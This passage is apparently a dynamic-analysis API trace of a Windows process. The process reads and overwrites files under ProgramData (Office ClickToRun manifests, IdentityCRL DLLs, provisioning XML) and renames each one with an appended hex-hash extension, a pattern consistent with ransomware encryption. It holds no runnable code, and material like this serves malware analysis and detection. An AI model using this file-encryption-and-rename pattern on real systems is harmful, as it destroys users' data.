lpString2=".DE14A6F512E6B7D0661C204B0F85ACBB4C15376E9BA608B18D470D8772AE602D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.DE14A6F512E6B7D0661C204B0F85ACBB4C15376E9BA608B18D470D8772AE602D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.DE14A6F512E6B7D0661C204B0F85ACBB4C15376E9BA608B18D470D8772AE602D" [0105.671] GetProcessHeap () returned 0x600000 [0105.671] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1ac) returned 0x30f1ef0 [0105.671] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x30f1ef0, Length=0x1ac, FileInformationClass=0xa) returned 0x0 [0105.674] CloseHandle (hObject=0x308) returned 1 [0105.675] GetProcessHeap () returned 0x600000 [0105.675] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0105.677] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.683] ReadFile (in: hFile=0x32c, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0105.683] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.684] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x27fff70) returned 0x0 [0105.685] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml", lpString2=".E305005790B2BE59E81A8183ACE8E67BA5253AF8A80207C47F3F014324EDB026" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.E305005790B2BE59E81A8183ACE8E67BA5253AF8A80207C47F3F014324EDB026") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.E305005790B2BE59E81A8183ACE8E67BA5253AF8A80207C47F3F014324EDB026" [0105.685] GetProcessHeap () returned 0x600000 [0105.685] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19a) returned 0x30f20a8 [0105.685] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x30f20a8, Length=0x19a, FileInformationClass=0xa) returned 0x0 [0105.686] CloseHandle (hObject=0x32c) returned 1 [0105.691] GetProcessHeap () returned 0x600000 [0105.691] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0105.694] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.700] ReadFile (in: hFile=0x32c, lpBuffer=0x315b140, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0105.700] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.701] WriteFile (in: hFile=0x32c, lpBuffer=0x315b140*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 1 [0105.701] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.702] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x27fff70) returned 0x0 [0105.703] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2=".3AA7C3F06C702F5C1EBE88CCBB16A8A3A4DC5979CF70798FCA87BA6392D8542D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.3AA7C3F06C702F5C1EBE88CCBB16A8A3A4DC5979CF70798FCA87BA6392D8542D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.3AA7C3F06C702F5C1EBE88CCBB16A8A3A4DC5979CF70798FCA87BA6392D8542D" [0105.703] GetProcessHeap () returned 0x600000 [0105.703] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1b4) returned 0x30f0bb8 [0105.703] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x30f0bb8, Length=0x1b4, FileInformationClass=0xa) returned 0x0 [0105.704] CloseHandle (hObject=0x32c) returned 1 [0105.706] GetProcessHeap () returned 0x600000 [0105.706] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0105.706] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.710] ReadFile (in: hFile=0x32c, lpBuffer=0x315b140, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0105.711] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.712] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x27fff70) returned 0x0 [0105.714] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml", lpString2=".EDE9707DD16E2F753267C83192ED6DF43086DBF39DCFBBF303747CC7E705236A" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.EDE9707DD16E2F753267C83192ED6DF43086DBF39DCFBBF303747CC7E705236A") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.EDE9707DD16E2F753267C83192ED6DF43086DBF39DCFBBF303747CC7E705236A" [0105.714] GetProcessHeap () returned 0x600000 [0105.714] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19e) returned 0x30f2250 [0105.714] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x30f2250, Length=0x19e, FileInformationClass=0xa) returned 0x0 [0105.715] CloseHandle (hObject=0x32c) returned 1 [0105.717] GetProcessHeap () returned 0x600000 [0105.717] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0105.718] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.725] ReadFile (in: hFile=0x32c, lpBuffer=0x315b140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0105.725] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.726] WriteFile (in: hFile=0x32c, lpBuffer=0x315b140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 0x0 [0105.726] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.739] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x27fff70) returned 0x0 [0105.740] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2=".56538CCB850B5F89A694F1C43C2F98F716EA047B025B9ED24D6A55D0EC90F40F" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.56538CCB850B5F89A694F1C43C2F98F716EA047B025B9ED24D6A55D0EC90F40F") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.56538CCB850B5F89A694F1C43C2F98F716EA047B025B9ED24D6A55D0EC90F40F" [0105.740] GetProcessHeap () returned 0x600000 [0105.740] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1bc) returned 0x30f23f8 [0105.740] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x30f23f8, Length=0x1bc, FileInformationClass=0xa) returned 0x0 [0105.741] CloseHandle (hObject=0x32c) returned 1 [0105.746] GetProcessHeap () returned 0x600000 [0105.746] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0105.748] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.843] ReadFile (in: hFile=0x308, lpBuffer=0x315b140, nNumberOfBytesToRead=0x6800, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0105.851] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.856] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x3164b08, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x3164b08, ReturnLength=0x27fff70) returned 0x0 [0105.857] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2=".C20683C0006D2655F4257AB56BA8B0480ADB8A138CCF3FD50CD0F3712DC70378" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.C20683C0006D2655F4257AB56BA8B0480ADB8A138CCF3FD50CD0F3712DC70378") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.C20683C0006D2655F4257AB56BA8B0480ADB8A138CCF3FD50CD0F3712DC70378" [0105.857] GetProcessHeap () returned 0x600000 [0105.857] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a8) returned 0x30f2cc0 [0105.857] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x30f2cc0, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0105.858] CloseHandle (hObject=0x32c) returned 1 [0105.861] GetProcessHeap () returned 0x600000 [0105.861] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3164a58 | out: hHeap=0x600000) returned 1 [0105.862] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0105.949] ReadFile (in: hFile=0x32c, lpBuffer=0x3184b90, nNumberOfBytesToRead=0x3600, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58) returned 1 [0105.957] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.083] ReadFile (in: hFile=0x308, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0106.083] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.136] WriteFile (in: hFile=0x308, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0106.137] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.138] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x27fff70) returned 0x0 [0106.139] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml", lpString2=".91B947D80728256A3E2232CDB309E0088FA5A46DB724DBCEEF51EAC0D42F6C16" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.91B947D80728256A3E2232CDB309E0088FA5A46DB724DBCEEF51EAC0D42F6C16") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.91B947D80728256A3E2232CDB309E0088FA5A46DB724DBCEEF51EAC0D42F6C16" [0106.139] GetProcessHeap () returned 0x600000 [0106.139] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19c) returned 0x318d0d8 [0106.141] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x318d0d8, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0106.142] CloseHandle (hObject=0x308) returned 1 [0106.147] GetProcessHeap () returned 0x600000 [0106.147] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0106.149] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.362] ReadFile (in: hFile=0x304, lpBuffer=0x315b140, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0106.362] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.363] WriteFile (in: hFile=0x304, lpBuffer=0x315b140, nNumberOfBytesToWrite=0x5e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 0x0 [0106.370] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.378] ReadFile (in: hFile=0x32c, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0106.378] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.379] WriteFile (in: hFile=0x32c, lpBuffer=0x3183f08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 1 [0106.379] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.380] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x27fff70) returned 0x0 [0106.381] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll", lpString2=".CD14C12384A0F27FAD30CCEA50BA446FF3B2760079076387E2A1D21F68B72900" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll.CD14C12384A0F27FAD30CCEA50BA446FF3B2760079076387E2A1D21F68B72900") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll.CD14C12384A0F27FAD30CCEA50BA446FF3B2760079076387E2A1D21F68B72900" [0106.381] GetProcessHeap () returned 0x600000 [0106.381] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x142) returned 0x30f2e70 [0106.381] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x30f2e70, Length=0x142, FileInformationClass=0xa) returned 0x0 [0106.382] CloseHandle (hObject=0x32c) returned 1 [0106.385] GetProcessHeap () returned 0x600000 [0106.385] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0106.386] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.453] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x27fff70) returned 0x0 [0106.454] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll", lpString2=".9B76D51A5E286AB163F5A241F643DFD3EFB2A387F1728D50E87158CA69CF1767" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll.9B76D51A5E286AB163F5A241F643DFD3EFB2A387F1728D50E87158CA69CF1767") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll.9B76D51A5E286AB163F5A241F643DFD3EFB2A387F1728D50E87158CA69CF1767" [0106.454] GetProcessHeap () returned 0x600000 [0106.454] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x134) returned 0x318d2a8 [0106.455] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x27fff60, FileInformation=0x318d2a8, Length=0x134, FileInformationClass=0xa) returned 0x0 [0106.459] CloseHandle (hObject=0x304) returned 1 [0106.466] GetProcessHeap () returned 0x600000 [0106.466] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0106.467] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.674] ReadFile (in: hFile=0x314, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0106.682] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.682] WriteFile (in: hFile=0x31c, lpBuffer=0x3183f08*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 1 [0106.784] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.807] WriteFile (in: hFile=0x31c, lpBuffer=0x6d48e8, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 0x0 [0106.808] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.876] WriteFile (in: hFile=0x314, lpBuffer=0x3183f08*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 1 [0106.877] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0106.880] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x27fff70) returned 0x0 [0106.880] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml", lpString2=".138E6CBCF435FDDCCD4FCFABFD8FA7F8200E39554849E0AACA98FBF772426A02" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.138E6CBCF435FDDCCD4FCFABFD8FA7F8200E39554849E0AACA98FBF772426A02") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.138E6CBCF435FDDCCD4FCFABFD8FA7F8200E39554849E0AACA98FBF772426A02" [0106.880] GetProcessHeap () returned 0x600000 [0106.880] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x318c0a8 [0106.880] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x318c0a8, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0106.881] CloseHandle (hObject=0x32c) returned 1 [0106.883] GetProcessHeap () returned 0x600000 